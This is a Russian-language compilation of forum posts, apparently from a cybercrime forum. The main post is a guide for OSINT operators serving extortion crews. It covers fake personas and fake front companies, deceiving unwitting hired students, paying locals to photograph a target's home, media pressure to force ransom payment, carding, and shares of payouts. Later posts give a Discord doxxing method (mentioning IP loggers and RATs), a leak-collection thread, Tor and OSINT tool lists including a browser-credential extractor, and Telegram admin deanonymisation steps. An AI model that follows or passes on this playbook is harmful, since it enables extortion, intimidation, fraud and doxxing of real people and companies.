Так же советую погуглить нейронки для убирания водяных знаков с фоток, и их уникализации. Ну либо в Фотошопе уникализируйте и удаляйте. Чтобы вас не могли "пробить" через поиск по картинке.
И предвосхищая вопрос, причем тут семья? Если вы более упоротый чем я, то можете создать всем своим личностям еще и семью, и вести их соц. сети. Но я к счастью шизофренией не болею, посему такое не делаю.
Прокачивать эти личности нужно будет от пары недель до пары месяцев. Это можно делать сразу, как создали, постепенно занимаясь другими делами. И да, не забывайте ру профили, их тоже можно качать и проявлять соц. активность, она нам в дальнейшем понадобится.
Покупать галочки, премиум на телегу и прочее - смотрите сами. На некоторые акки я беру. Еще важно, расширяйте социальное взаимодействие. То есть добавляйтесь в друзья к разным людям, обсуждайте с ними что-то, лайкайте их фотки и т.д. Без фанатизма, но чтобы профили выглядели как живые. Это нужно для того, чтобы взглянув на них, человек за экраном не заподозрил ничего.
Общие группы, общие интересы, общие знакомые - опирайтесь на это. Не злоупотребляйте, но пару пересечений вы всегда найдете, а учитывая, что указанные мной выше персонажи попадают в среднего работника компании, то общее всегда найти легко.
На этом пока с соц. сетками кончаем, потом затронем их еще раз. Как раз поймете для чего все это еще нужно.
7. Компании (фейк).
Так как осинт это уже не только гугл и парсинг сеток, нам нужны будут корп
почты, и вообще, пора выглядеть солидно. Нам понадобятся:
1. Домены
2. Хостинг
3. Сайты
Сначала объясню зачем нам все это надо.
Некоторые (многие) сервисы просят корпоративную почту, и на gmail их уже не регнешь. Так же, если вы пишите в компанию какой-нибудь запрос, логичнее отправлять его (запрос) от имени компании. Так же и в других разводках солиднее будет действовать от имени компании. Поэтому нам надо создать такие компании. Расходы минимальны (на 3-5 сайтов у вас уйдет не больше 50-70$, а профитов будет в разы больше).
Начнем с доменов. Свежереги можно, но не желательно. Возьмем т.н. дропы. Что это - гуглите если что.
Сервисы рекомендовать не буду, приведу скрин одного из таких сервисов:
Фишка тут в том, что сервис еще выкачивает сайт, который был на этом домене.
Настраиваем фильтры, выбираем несколько доменов под тематику, которая нам
подходит (тут на свое усмотрение), покупаем архив с сайтом, регаем домен,
вешаем на хостинг, прикручиваем Cloudflare, https и прочее для солидности, и
наша "фирма" готова.
Так же можно выкачивать сайты и с веб-архива.
Пару нюансов и советов, которые вам стоит заранее знать.
Совет раз: Берите буржуйские хостинги и доменных регистраторов. Но учитывайте такой момент, что они любят долбать проверками и верификациями. К этому надо быть готовым.
Совет два: Прикручивайте сразу https, cloudflare и прочее. И все проверяйте
несколько раз. Так же заморочтесь настройкой mail-сервера, чтобы письма
отправлялись и приходили к вам. Потестируйте! Отправьте письмо с gmail,
отправьте письмо на него и т.д.
Попереписывайтесь с парой любых компаний. У многих компаний есть почта что-то
типа support@firma.com. Убедитесь, что все
работает. Аттачи так же протестируйте.
Совет три: Одна компания - один хостер\регистратор домена, один акк cloudflare и т.д. Не выстраивайте между ними связь.
Совет четыре: ПРОВЕРЯЙТЕ ИСТОРИЮ КОМПАНИИ. Пару раз вначале попадал на то, что регал все, а потом гуглил за компанию, под которую закосил, а там скам, негатив и куча шлака. Ее конечно все еще можно использовать под "корп-почту", но каких-то серьезных движений уже не сделаешь. Обидно.
Если будут вопросы по хостингам, доменам и прочему, то не стесняйся спрашивать на форуме, или в данной теме. Но думаю суть понятна и проста.
=============ПРОМЕЖУТОЧНЫЙ ИТОГ=============
Я не хочу перегружать информацией статью, или строчить простыни ради простыней, но и обрывать статью, не развив целиком идею, которую я хотел донести, я не буду. Поэтому важно подвести на данном этапе промежуточный итог.
Итак, на данный момент у тебя есть:
1. Кошелек с 300-500$ на счету
2. Сканы с селфи для регистраций в платежках, у хостеров и т.д.
3. Антидетект браузер с соксами и профилями в соц. сетях по типу линкеда, фб,
x и других. С биографией, фоточками и прочим. И да, фотки не заливай все
сразу, а добавляй постепенно.
4. Карты зарубежных банков, пейпал. Для оплаты различных сервисов.
5. Сайты компаний и корпоративные почты на доменах этих компаний.
Это как говорят у нас в бейсболе - первая база. То, что нужно сделать в любом
случае. Ибо осинт не ограничивается просто поиском, особенно осинт, который
нужен в "нашем бизнесе".
Возможно пока непонятно к чему я веду, но постепенно будет становиться яснее.
Если же понятно к чему я веду, то поздравляю, вы молодец =)
=============ЗАКОНЧИЛИ ПРОМЕЖУТОЧНЫЙ ИТОГ=============
8. Софт и сервисы для КОРПОРАТИВНОГО осинт
Тут следует пояснить немного, так сказать дисклеймер. То что говорит гугл про осинт, это не совсем то что нам нужно. Мы делаем наш осинт для атак и получения доступов. А так же для переговоров. Как сказал великий ****:
Так вот к чему я это. То что наша задача получить и сделать максимум, чтобы
заработать. Поэтому да, в ваши обязанности будет входить и скан сеток,
составление карты и прочего. Это тоже относится к осинт. Дальнейший шантаж и
переговоры - тоже задача осинта, так как он собирает всю информацию, и он
использует соц. инженерию для этого. Поэтому не удивляйтесь, что на вас так
много обязанностей. В дальнейшем это можно делегировать, распределить роли и
т.д., но на начальных этапах делаем все сами.
Так же важно отметить еще несколько моментов.
Момент 1: Я не буду расписывать много для чего софт, и как с ним работать. Вы, как осинтщики найдете мануалы по нему сами. Благо их в сети хватает, а делать рерайт этих мануалов, это пустая трата времени.
Момент 2: Так как наш осинт корпоративный, то зачастую мы будем использовать сервисы B2B. Сервисы B2B предполагают высокую стоимость, тот же зуминфо например стоит от 15к в год. Но! Всегда есть прекрасное но. Все эти сервисы предоставляют так называемые "триалы". То есть дают попользоваться бесплатно, прежде чем подсадить вас на подписку. На первых порах вам достаточно будет этих триалов. Когда вы покажете, что вы приносите результат, будьте уверены, вам эти расходы оплатят.
Момент 3: Легенды и схемы разговора. Если мы исходим из того, что звонить
будем не мы (а зачастую нужны будут созвоны), то у вас для прозвонщика должна
быть готова схема диалога и легенда. И не одна, а сразу несколько.
То есть вы ему даете задание: Позвонить в компанию, чтобы получить триал. И в
вашей схеме должна быть легенда, что вы за компания, зачем вам этот сервис,
как вы будете его использовать и так далее.
Дальше к этому должна прилагаться схема по типу FAQ, если они спросят это -
ответить это. А если скажут так - ты скажешь так.
Я не буду выкладывать здесь свои наработки, так как каждый их нарабатывает
самостоятельно. Это одна из причин, что команду и своих людей нужно всегда
держать при себе. Даже в тяжелые времена, так как наработки потом могут утечь.
Как пищу для размышления, дам одну известную цитату:
«Никогда ни у кого ничего не просите, особенно у сильных Мира Сего - сами придут и все дадут.»
Click to expand...
То есть не настаивайте никогда, что хотите получить что-то бесплатно, или потестировать. Больше интересуйтесь, и позволяйте себя убедить, что вы может быть попробуете ИХ продукт.
Момент 4: Не забывайте про кряки различные, или же кардинг. Всегда можно заплатить меньше, или вообще на халяву поиметь что-то. Или с тех же логов... Короче, пока тренируетесь, старайтесь экономить денежки. Потому что не факт, что вас таких красивых и умных сразу заберут в команду. Хотя, учитывая сколько сегодня команд, шансы велики попасть в одну из них. Но об этом как обычно - позже.
Момент 5: Иногда, некоторые сервисы готовы предоставлять бесплатный доступ студентам. Все что вам надо, это почта универа. .edu. Купить можно тут на форуме, и юзать как студент. Посмотрите если что и в такую сторону.
Итак, софт\сервисы:
1. Maltego. Еще конти ее по-моему использовали. На ютубе полно мануалов по этому софту, в том числе и официальных. Как говорится:
2. Shodan/Censys/Fofa/etc. Все эти поисковики. Оплатить их можем без проблем, у нас есть карты. Ну или палка. Мануалы по шодану на русском даже где-то тут по форуму гуляет. Найдете.
3. ZoomInfo/rocketreach/etc. Тоже своего рода база для первичного анализа. О них писал в предыдущей статье. Тот же зум на 1-30 дней можно получить триал. Главное грамотно запиздеть манагера.
4. Утечки. Выкачивайте базы ФБ, твиттера, линкеда и прочих. Выкладывают их обычно на форумах по типу бричед и креккед. Так же тут на форуме. Иногда чтобы скачать нужны реакции, или платный акк, но и тут XSS приходит на помощь, например: xss.is/threads/113066/ (ЧЕЛОВЕК НЕ ЗНАЮ, ПРОСТО БЕГЛЫЙ ПОИСК ПО ФОРУМУ!)
5. Потыкайте софт, что выложили на хабре: хабр/ru/articles/769690/ Писать в сотый раз то, что уже обсуждалось и выдается первыми строками гугла смысла нет. Либо просто загуглите Osint Soft, информации полно. Тут уже каждый подбирает под себя, что ему надо.
6. Это можно отнести и к п.5, но отдельно выделю такие сервисы, как:
osintframework.com
intelx.io
intel471.com (ога, именно та х#йня, которая засвечена при многих
расследованиях). Там же у них на главной книга валяется (на английском).
Почитайте на досуге и для общего развития.
lampyre.io
spokeo.com
github.com/ninoseki/mitaka
seon.io
Припиздел бы конечно, что я юзал или юзаю все эти сервисы и весь этот софт, но правда такова (и никакова друга), что я и половину не юзал. Просто знаю об их существовании, знаю, что в некоторых командах используют тот или иной софт\сервис. Но вам на потыкать, посмотреть и подобрать то, что вам надо будет полезно. Благо мануалов куча как в виде пдфок, так и на ютабчике. Дерзайте как говорится =).
9. Прозвоны.
Как ни крути, а все только тыкая на эти ваши кнопочки, хороший результат
получить нельзя. Все эти конторы очень любят созвоны. По зуму, или по
телефону, сути дела не меняет, нужно звонить, общаться, договариваться.
Варианта у нас как обычно два: либо сами, либо нанимаем кого-то.
Вариант первый - сами. Мне он не подходит, так как "Лондон зе кепитал оф грейт британ", и безопасность. Но дело не только в плохом знании английского. Это еще и трата времени, которого не так много, когда ты все делаешь сам. Поэтому я предпочитаю наемных сотрудников на эту должность.
Вариант второй - найм. Вот здесь я немного полью воды и порассуждаю. А соглашаться, или нет - дело сугубо ваше.
Где нанимать, вот главный вопрос. Сервисы на форумах - это всегда приведет к
тому, что ваши скрипты для прозвонов украдут, будут использовать еще. Да и
качество сервисов на форумах оставляет желать лучшего. Можете сами почитать
отзывы в любом сервисе, который работает 1год+. С простыми задачами да, они
справляются. Но любое не стандартное решение порождает у них всегда проблемы.
Но самое ужасное даже не это, а то, что их ошибки прямо влияют на ваш
результат, и приводят к финансовым и временным потерям.
Ну и не стоит забывать стоимость звонка в сервисах, от 10$ за звонок. При
грамотном осинте и постоянной работе, звонков в день может быть 10-20. А это
100-200$ ежедневно. Понятно, что одна выплата перекрывает эти расходы с
лихвой, но до нее еще надо дойти. А при низком качестве звонков не факт, что
это случится быстро.
Короче, найм на форумах нашей (кардерской в том числе) - палка о двух концах. С одной стороны человек понимает что делает, и может это делать. А с другой стороны стоимость услуги, не постоянство, риск утечки информации и прочее.
Поэтому поделюсь (раз ты уж дочитал до сюда дорогой читатель, то тебе реально это интересно) то, как делали мы (уже сформировали команду). Помнишь, в пункте про соц. сети я писал, что регни ВК так же, и заполни его? Так вот, нам нужны студенты, которые учатся в университетах с углубленным изучением английского. Это наш контингент, который нам нужен. Здесь сразу сделаю FAQ, и ты поймешь почему.
_**Q: Тянуть студента в чернуху?
A: При осинт нет никакой чернухи. Регнуть аккаунт, уточнить детали и т.д. Это
полностью белая (ну может немного серая) работа. Особенно, если ты составишь
легенду. У нас была такая, что мы B2B компания из Казахстана, которая
расширяется на европейский и американский рынок, нанимаем сотрудников по всему
миру.
Q: Как им платить?
A: Обменники. Просто на карту. Средний студент 3-4 курса с удовольствием
согласится на ЗП в 600-800$\месяц. В странах СНГ можно найти еще и за меньшие
деньги.
Q: Но он не в теме!!111**_
A: А ему и не нужно быть в теме, все зависит от твоих скриптов, которые ты
ему напишешь, и легенды, почему он это делает. Наши были уверены, что они
реально менеджеры, и борются за место под солнцем для нашей компании.
Сражались как львы =)
Если возникнут еще вопросы, можно задавать их тут, или в личке, попиздим там =)
Все что я хочу сказать, не стесняйтесь привлекать людей из вне. Это дешевле, и
надежнее. Что же касается переговоров, угроз жертвам и прочее - тут можно
постепенно вводить 1-2 человек в игру, и вербовать их более серьезно. Но и
платить им придется другие деньги.
Но если ты начинающий осинтщик, с начинающей командой звонил, то тебя вначале
и не допустят к переговорам. А когда ты созреешь, то уже обзаведешься
надежными людьми.
10. Дропы
Вот чего многие не делают (хотя может просто я не встречал такое в командах),
но это использование USA\EU дропов для целей шантажа, или других задач.
Сервисы типа bazar, или группы в телеге, где работяги ищут подработку. За
20-50-100$ их можно использовать для решения задач по местности.
Как пример: приехать к дому того, кто решает по выплате, и отфотать его дом,
оставить записку, отправить посылку на домашний адрес и т.д. Это очень
помогает жертве быть сговорчивее.
Либо, если вы прокачали красноречие в электронном виде, то можно таких
использовать и для более "деликатных" поручений. Тут все ограничивается вашей
фантазией. А еще не забываем, если вы работаете по USA, про негров =)
Дропы - это тот случай, когда можно пойти и на кардинг форумы, и там переговорить с дроповодами, у которых есть "отмороженные" единицы, если не хотите сами этим заниматься, а просто поставить задачу. Сюда же отнесу консультации с юристами через тот же fiverr, и самое главное - взаимодействуйте с журналистами. Потому что шумиха в СМИ это +100 к сговорчивости =).
Тут много писать не буду, чтобы статья не выглядела пособием для шантажа =) Но пищу для размышлений я вам подкинул.
11. Скрипты.
Это рандомная картинка из интернета, но чтобы дать вам визуальное понимание
того, что такое скрипты.
Когда вы будете раздавать задания прозвонщикам, у вас на каждый случай должен
быть такой разработанный скрипт, в котором вы предоставляете все возможные
варианты диалогов, чтобы прозвонщик мог четко действовать. Заранее его
подготовить не получится, он приходит только с опытом.
Позвонили - > поимпровизировали -> прослушали запись -> составили\дополнили скрипт -> повторили.
Скрипты касаются как разводок уже жертв, так и регистраций и прочей мути. Это считайте опять БАЗА.
Здесь вы проявляете свою фантазию, и навыки социальной инженерии. Помните, что люди, это те же программы, которые делают по определенным алгоритмам. Конечно, не стоит прозвонщику тараторить строго по скрипту, это скорее каркас, который, в случае атаки будет видоизменяться, подстраиваясь под увлечения\страхи\зависимости жертвы. Но каркас в любом случае будет неизменным.
Главное не ленитесь их составлять. Даже если вам по началу это кажется глупым.
=====================ЭПИЛОГ=====================
Для чего все это? Как написал уважаемый marmalade не проще ли атаковать массово? Кому-то проще, кто обладает техническими знаниями, умеет работать с эксплойтами и прочее. Я же не обладаю такими навыками. Возможно, это основная причина. А возможно, у меня просто другой подход, который мне нравится и приносит доход.
В отдельные пункты я хотел еще выделить несколько моментов, но распишу их здесь.
1. Выбирайте определенную индустрию. Выбрали например адвокатов, долбите строго их. Соберите всю инфу на компании (штук 50-100), соберите информацию о работниках, информацию о сети. То есть полное досье на каждую компанию. Изучите методы давления (персональные данные клиентов, слив конкурентам, черная бухгалтерия и т.д.), это делается все заранее, прежде чем вы будете атаковать. Чтобы потом действовать уже оперативно.
Как отработали нишу, выбираете следующую, изучаете то же самое, и вновь атакуете.
2. Развивайтесь. Если вы сейчас сидите без дела, то читайте про Maltego, OSINT (если что, чиркайте в личку, поделюсь книжками). Собирайте по фану инфу, чтобы потом собрать себе портфолио, и попасть в команду.
3. Если нечего делать, пишите скрипты. Выстраивайте диалоги в голове.
Как на этом можно заработать?
Я приведу скромную математику. Минимальная выплата обычно от 100к$. OSINT (без переговоров) получает от 3 до 10%. В среднем спокойно можно ставить 1-2 компании в день. Если набить руку. Считать я думаю все умеют.
Если вы можете развиться еще как и переговорщик, то плюсуйте еще от 5 до 15%. И все эти деньги можно получать не обладая специфическими знаниями и умениями. Просто читаете, анализируете, и тыкаете свои кнопочки.
На этом думаю все. Честно, устал писать. Будет еще вдохновение, напишу еще что-нибудь. Но базу осинта, и что и как я дал.
Спасибо за внимание!
https://disk.yandex.ru/d/SWTErnPlZvMJyQ - (Андрей Масалович) Охота за информацией в 2021 году
https://cloud.mail.ru/public/YXvQ/QYwDujkE9 - (Андрей Масалович) Поисковые системы и конкурентная разведка в интернете (2022)
Не знаю замечали вы или нет, но у них логи от стиллеров, не знаете с какого источника берут?
Первая статья, если вы чайник и не знаете что такое осинт вам это врядли поможет.
Если вы умеете анализировать информацию, искать по нику фото метаданным и другой инфе то мануал полезный.
В качестве примера использовались рандомные люди.
==========================================================================================================================================
Discord — кроссплатформенная проприетарная система мгновенного обмена
сообщениями с поддержкой VoIP и видеоконференций,
предназначенная для использования различными сообществами по интересам.
Система наиболее популярна у геймеров и учащихся.
==========================================================================================================================================
https://discord-tracker.com/tracker/tracking/ - Покажет старые ники,
аватарки, сервера, баны на серверах, демки, удаленные изменненые и упомянающие
жертву, в хороших руках сильный инструмент.
==========================================================================================================================================
https://t.me/DiscordSensorbot - Телеграм бот похожий на дискорд трекер, иногда выдает другую инфу которой нету в трекере.
С помощью функции /nick можно попробоывать найти старый аккаунт жертвы.
С помощью инструментов выше мы можем определить на каких серверах сидит человек, можно проанализировать его сообщения, живой пример, один дискордовский "сватер", раннее заходил на сервер по игре Garry's mod, и оставлял заявку на модератора, с помощью чего я узнал его имя, возраст, стим и т.д
==========================================================================================================================================
Если у жертвы есть значок "Старое имя" то можно данное старое имя чекнуть в
поисковике по типу яндекс с кавычками или intext.
==========================================================================================================================================
Так же у пользователя могут быть интеграции других социальных сетей, таких как Paypal, Reddit, Steam, Tiktok, Twitter (X), ebay, Crunchyroll, Playstation Network, Spotify, Xbox, Twitch и другая парaшa
Товарищи из России чаще всего используют: Steam, Tiktok, Twitch, Youtube, Spotify.
Кратко расскажу про социальную инженерию, можете втереться в доверие к жертве и она сама вам откроеться и вы получите инфу.
Предлагаете жертве дружбу, сотрудничество, и т.д, спустя время она сама вам раскрывается и вы получаете нужную вам инфу.
==========================================================================================================================================
Еще можно посадить его на айпи логгер (Ну или же на ратку но с этим я вам помогать не буду.)
Сайты:
by saiteko
Пишите что это говно а не мануал, дополняйте своими инструментами, отвечу на
вопросы.
Предлагаю в этой теме собирать и искать архивы с утечками информации, слитой
при атаках на разные организации.
Аналог темы Поиск дампов и Leaks Новости .
Только тут коллекционируем и обмениваемся не БД - а всем остальным. Исходники
софта, внутренние документы, чертежи и так далее. Ссылки на файлы из блогов
ransom-команд.
Все что когда-либо было слито и может кому-то пригодится. Тема некоммерческая.
Для старта - очень интересны сливы примерно 2018 года от замечательной команды
Digital Revolution . Информация оттуда, возможно, сильно пересекается с моим
направлением по FPGA.
И чуть менее интересны сливы от 0v1ru$ . Эти данные могут помочь более
детально разобраться в ситуации, которая сейчас имеет место быть в РУ (речь
про контроль трафика, блокировки через ТСПУ и способы деанона пользователей
TOR).
Полезные ссылки (upd: 13.12.2023):
https://ddosecrets.com/wiki/Special:AllPages
https://ransomwatch.telemetry.ltd/#/recentposts
https://privtools.github.io/ransomposts/
https://ransomware.live/#/recentvictims
https://www.ransomfeed.it/
TOR может быть таким же отличным источником информации, как и Google. Главное — уметь искать. В этом посте мы поделимся полезными и актуальными ссылками на различные ресурсы и утилиты, благодаря которым ты сможешь найти нужную информацию в сегменте .onion
Полная TORификация
Исследователям, шифропанкам и просто любопытным. Обновленный full pack!
1. Tor-мессенджеры
Tinfoil Chat
Ricochet Refresh
Briar
Speek
cwtch.im
Anonymous Messenger
Quiet
2. Информация о нодах
TOR Node List
ExoneraTor
Onionite
Tor Metrics
[Collector Tor](https://collector.torproject.org/archive/relay-
descriptors/microdescs/)
3** . Работа с нодами**
Tor Relay Availability Checker
noContactInfo Tor Exit Relay Excluder
torspray
node-Tor
BridgeButtons
4** . Краулеры сайтов**
TorBot
OnionBot
OnionIngestor
Midnight Sea
VililantOnion
OnionScan
Fresh Onions TOR Hidden Service Crawler
Darkweb Crawler Project
Tor Onion Site Scraper
TorCRAWL
5. Поисковые системы (скрипты)
Katana
OnionSearch
Darkdump
Darkus
6. Поисковые системы (клир)
Ahima
OnionSearchEngine
Darkhunt
Onionland
7. Поисковые системы (онион)
EXCAVATOR
Devil
Search
TorDex
Torgle
Raklet
Phobos
VormWeb
Dig
Shoot
8. Каталоги ссылок .onion сайтов
Список 1
Список 2
Список 3
9 . Пускаем трафик через Tor
Orbot
[Android]
InviZible Pro [Android]
Advanced Onion Router [Windows]
Tor Expert Bundle [Windodws]
Tallow [Windows]
Electrum через Tor [Windows]
anon-service [*nix]
10. Вне категорий
onionpipe
Conjure
Crypto Uploader
Tor в Telegram
Tor на OpenWRT
#Tor #софт #приложение #приватность #аноинмность
Инструменты OSINT для Onion сайтов
Небольшой список полезных инструментов для работы с сайтами в сети Tor.
Поисковые утилиты :
1. OnionSearch - github.com/megadose/OnionSearch
2. Darkdump - github.com/josh0xA/darkdump
3. Ahmia Search Engine - ahmia.fi и github.com/ahmia/ahmia-site,
4. DarkSearch - darksearch.io и github.com/thehappydinoa/DarkSearch
5. Katana - github.com/adnane-X-tebbaa/Katana
Инструменты для получения onion ссылок
1. Hunchly - hunch.ly/darkweb-osint/
2. H-Indexer - jncyepk6zbnosf4p.onion/onions.html
3. Tor66 Fresh Onions -
tor66sewebgixwhcqfnp5inzp5x5uohhdy3kvtnyfxc2e5mxiuh34iid.onion/fresh
Инструменты для сканирования
1. Onionscan - github.com/s-rah/onionscan
2. Onioff - github.com/k4m4/onioff
3. Onion-nmap - github.com/milesrichardson/docker-onion-nmap
Краулеры
1. TorBot - github.com/DedSecInside/TorBot
2. TorCrawl - github.com/MikeMeliz/TorCrawl.py
3. VigilantOnion - github.com/andreyglauzer/VigilantOnion
4. OnionIngestor - github.com/danieleperera/OnionIngestor
Прочее
1. DeepDarkCTI - github.com/fastfire/deepdarkCTI
OSINT:
1. IACA darkweb tools — стартовая страница для двух десятков поисковых
систем, работающих с TOR и доступных из обычного веба.
2. SearchDemon, Phobos, Tor66, ExcavaTOR, Raklet, SeИtoЯ, Torch, OnionLand
Search — поисковые системы, работающие внутри сети TOR.
3. Exonera Tor — база данных IP-адресов, которые были частью сети Tor.
Поисковик отвечает на вопрос, работал ли ретранслятор Tor на этом IP-адресе в
выбранную дату.
4. TorBot — удобный Onion краулер. Собирает адреса и названия страниц с
кратким описанием, получает адреса электронной почты с сайтов, проверяет,
активны ли ссылки, и сохраняет отчеты в JSON. Может быть запущен в Docker.
5. Katana-ds — Python-инструмент для автоматизации поиска с использованием
Google Dorks и с поддержкой TOR.
6. OnionSearch — скрипт Python3 для автоматизации поиска в зоне .onion через
общедоступные сервисы.
7. Devils Eye — это инструмент OSINT для поиска в Darkweb. Не требует
установки TOR. Также может искать в сети i2p.
Также прикрепляю другие полезные материалы по теме TOR:
- Tor: от азов до продвинутого уровня
- Размещаем свой TOR-сервис на .onion адресе
- OSINT инструменты для теневой части интернета
OSINT : подборка инструментов для автоматизации разведки
Фактически, весь OSINT сводится к тому, что вы просто анализируете всю доступную в интернете информацию о человеке.
— Ручным поиском у вас уйдёт по меньшей мере пара часов, а автоматизировав поиск, например, с помощью Snoop не более 5 минут(ведёт поиск сразу минимум по 500 источникам). Остаётся лишь проанализировать и структурировать её.
- Инструменты поиска по имени и по никнейму:
Maryam — в принципе, это один из самых многофункциональных инструментов
поиска. Он неплохо подойдёт и для поиска по реальному имени и для поиска по
никнейму.
Snoop — это один из самых быстрых и мощных инструментов для поиска по имени.
Он использует около 500 источников для сбора информации.
Alfred — утилита для сбора информации и идентификации аккаунтов в социальных
сетях.
- Инструменты поиска по Email :
Ghunt — поиск информации о владельце Google аккаунта;
Epieos - найдет Google ID, даст ссылки на профиль в Google карты, альбомы и
календарь, найдет к каким сайтам привязана почта, профиль LinkedIn.
H8mail - инструмент для поиска взломанных адресов электронной почты и
используемых на различных сайтах паролей в утекших базах данных.
- Инструменты для анализа и мониторинга соц. сетей :
Social Searcher — бесплатный инструмент для мониторинга социальных сетей.
Фактически это поисковая система, которая ищет упоминания по запросу.
Google Alerts — уведомляет вас о появлении в интернете указанной информации.
Этот инструмент вы можете применить как на себя (мониторить информацию о
себе), так и на вашу цель.
Информация важный и ценный ресурс в 21 веке. Кто владеет информацией - тот владеет миром.
Вишенкой на торте будет - подборка ИБ-подкастов Подготовили для вас самые стоящие подкасты, в формате различных шоу и экспертных интервью и трукрайм, надеемся, что они помогут прокачать вам свои профессиональные навыки, узнать последние новости и заодно прокачать английский язык. — К сожалению, подборка состоит по большей части из англоязычного контента, ибо спустя много лет неспешного развития русскоязычный подкастинг все еще остается нишевым сектором, которому не хватает внимания слушателей и рекламодателей. 1. The Pivot Podcast — подкаст, созданный при поддержке Maltego и посвященный OSINT и информационной безопасности. В каждом эпизоде участвуют один или два эксперта из Maltego, а также внешний специалист, которого пригласили поделиться опытом и советами. 2. Hack me, если сможешь — подкаст о современных киберугрозах и защите от них, созданный при поддержке Positive Hack Days — одноименного ИБ- форума. 3. Cyber Sector 7, OSINT, Hacking, & Privacy — советы по безопасности, цифровой конфиденциальности, OSINT, а также рассказы о хакерских методах, новостях и культуре. 4. Darknet Diaries — знаменитый подкаст о хакерах, взломах, хактивизме, киберпреступности и обо всем, что происходит в даркнете. 5. Malicious Life — малоизвестные инциденты глазами тех людей, которые действительно были там. Заприте дверь, сотрите жесткий диск и приходите послушать увлекательные истории из киберподполья. Также прикрепляю другие полезные материалы по теме: - GitHub: Ресурсы по информационной безопасности - OSINT-альманах: сборник ресурсов и порталов #Podcast #ИБ #OSINT
#OSINT #Recon #Tools
Подборка OSINT инструментов. Часть 21. Крипта. [4]
1. breadcrumbs — визуализатор транзакций + исследовательский инструмент с неплохим, но платным функционалом.
2. Walletexplorer — устанавливает связи ВТС адреса с различными крипто- сервисами и проверяет баланс.
3. find-my-btc-wallet — софт, который ищет ВТС-кошельки и приватные ключи на запускаемом компьютере.
4. Antinalysis — бесплатный инструмент анализа крипто адресов. Работает только в Tor, строит древа транзакций, имеет 11 категорий идентификации.
5. YouTube Comments Finder — поиск по комментарием YouTube, можно использовать для поиска криптовалютных адресов.
Bitcoin Transaction Visualizer — новый инструмент для ончейн-разведки и визуализации криптовалютных транзакций.
Paranoia Access — приложение, которое отслеживает активность микрофона, камеры, GPS и присылает уведомление об их использовании. В текущей версии программы так же добавлена проверка изоляции публичных Wi-Fi точек и функционал удаления метаданных с фотографий. Скачать в Google play
Tor Onion Site Scraper — краулер .onion сайтов
<https://github.com/joelhagvall/tor-
onion-site-scraper>
https://github.com/MikeMeliz/TorCrawl.py
CVExploits - самая полная база данных об эксплойтах CVE в интернете. https://cvexploits.io
HackBrowserData — это инструмент для расшифровки и экспорта данных браузера (пароли, история, куки, закладки, кредитные карты, история загрузок, localStorage и расширения).
https://github.com/moonD4rk/HackBrowserData
Gobuster — быстрый, простой в использовании и многофункциональный инструмент поиска файлов методом подбора.
https://github.com/OJ/gobuster
Альтернативные программные продукты:
https://sourceforge.net/projects/dirbuster/
https://dirb.sourceforge.net/
https://github.com/epi052/feroxbuster
https://github.com/xmendez/wfuzz
Всех глубоко приветствую. Я занимаюсь осинтом много лет и последние годы дали
понять что osint стал менее значимый для даркнет/хакинг сообщества, пример: на
осинте ты можешь заработать 10.000$-50.000$ за цель ( в некоторых случаях
больше, но сейчас очень мало действительно опытных осинтеров ) Взять
DDoS и pentest ( первое - зашквар уже возможно ), но даже эти две сферы
принесли бы гораздо больше денег
Вопрос осинтерам, что вас тут
держит?
Важно понимать, что универсального способа поиска админа и владельца канала нет. Однако можно отдельно выделить рабочие способы и источники которые помогают ответить на вопрос.
Перед началом поиска убедитесь в точности формулировки своей цели. Хотите узнать кто владел каналом? Кто там администратор? Кто его владелец сейчас? Или все вместе?
В статье не увидите методы фишинга и социальной инженерии. Будем работать с
историей и по минимуму взаимодействовать с пользователями.
Определимся с чем будем работать, что известно о канале и что с этим делать.
Вот что обычно на канале встречается чаще:
Что в ней может быть? Всё. Фото и аудио, ссылки и файлы. Соберите из поcтов: текст, ссылки, аудио, видео, изображения и найди в t.me/HowToFind_RU_bot где искать по этим данным. В посте фото? Выбери в боте поиск по фото и перебирай каждый источник в списке. Но, вот что в посте приведет нас к цели:
Это ссылка с реферальным идентификатором. На каналах размещают ссылку на бот
где зашифрован или виден Telegram ID пользователя бота. Пример:
https://t.me/EyeGodsBotsBot?start=1628834658
где 1628834658 это ID аккаунта Telegram.
Не спешите бросать ссылку если там после start вписаны еще и буквы. Это внутренний идентификатор пользователя. Узнайте способ найти по внутреннему идентификатору бота пользователя. Например спросите поддержку этого робота кто создал ссылку или выполните поиск в боте, если конечно функционал позволяет.
II. Приватная ссылка
До 2017 года Telegram генерировал приватные ссылки в группы и каналы с
зашифрованным ID аккаунта создателя этой ссылки, то есть админа или создателя
канала.
Что значит приватная ссылка? Эта та в которой присутствует фраза joinchat.
Пример: https://t.me/joinchat/AAAAAFcF8lv6w7Y4RfSW5Q
В каких ссылках ID аккаунта Telegram?
В длинных. Эти ссылки содержат 16-18 символов после фразы joinchat. Например:
https://t.me/joinchat/FNPR30Fs51OX1853MfCKVg
В каких ссылках НЕТ ID аккаунта?
В публичных. Адрес в этой ссылке задает сам администратор, что хочет, то и
пишет в ней. Пример: t.me/durov
В ссылках с AAAAA. Что такое AAAAA? Это зашифрованные нули вместо ID аккаунта.
Следовательно такие ссылки бесполезны для дешифровки. Более того они ведут
только на приватные каналы. Согласно веб-архиву появились эти ссыли в начале
января 2017 года. Пример: https://t.me/joinchat/AAAAAFcF8lv6w7Y4RfSW5Q
В коротких. Эти Telegram ввел как для каналов так и для групп. Появились в
2019 году и создаются по сегодняшний день. Содержат до 18 символов после
joinchat. Пример: https://t.me/joinchat/t5OICPRwudQ2MmFh
Как расшифровать и узнать ID аккаунта создателя ссылки?
Убедитесь что ссылка содержит ID аккаунта. Выше уже были перечислены виды
ссылок.
Скопируйте все после фразы joinchat. Пример: из
http://t.me/joinchat/D-3jrhMOTiIE-WwV8wnomA останется D-3jrhMOTiIE-
WwV8wnomA. Это хэш сумма.
Откройте сайт 8gwifi.org. На сайте в первое input введите эту хэш сумму, и
нажминте Sumbit.
Вы получите число, это ID аккаунта создателя приватной ссылки. Пример: 267248558.
Чтобы узнать по ID информацию аккаунта и его упоминания, можно использовать ресурсы для поиска по ID аккаунта Telegram в каталоге источников — t.me/HowToFind_RU_bot, где есть ресурс t.me/usinfobot. Впишем в поле для ввода сообщения @usinfobot 349426143 и узнаем имя и ссылку аккаунта Telegram.
Если ссылка не работает, то ID аккаунта остаётся, однако не узнаете так быстро куда она эта ссылка вела. Посмотрите упоминания ссылки в поисковиках по Telegram ну и в Google тоже полезно проверять.
III. Подпись у поста
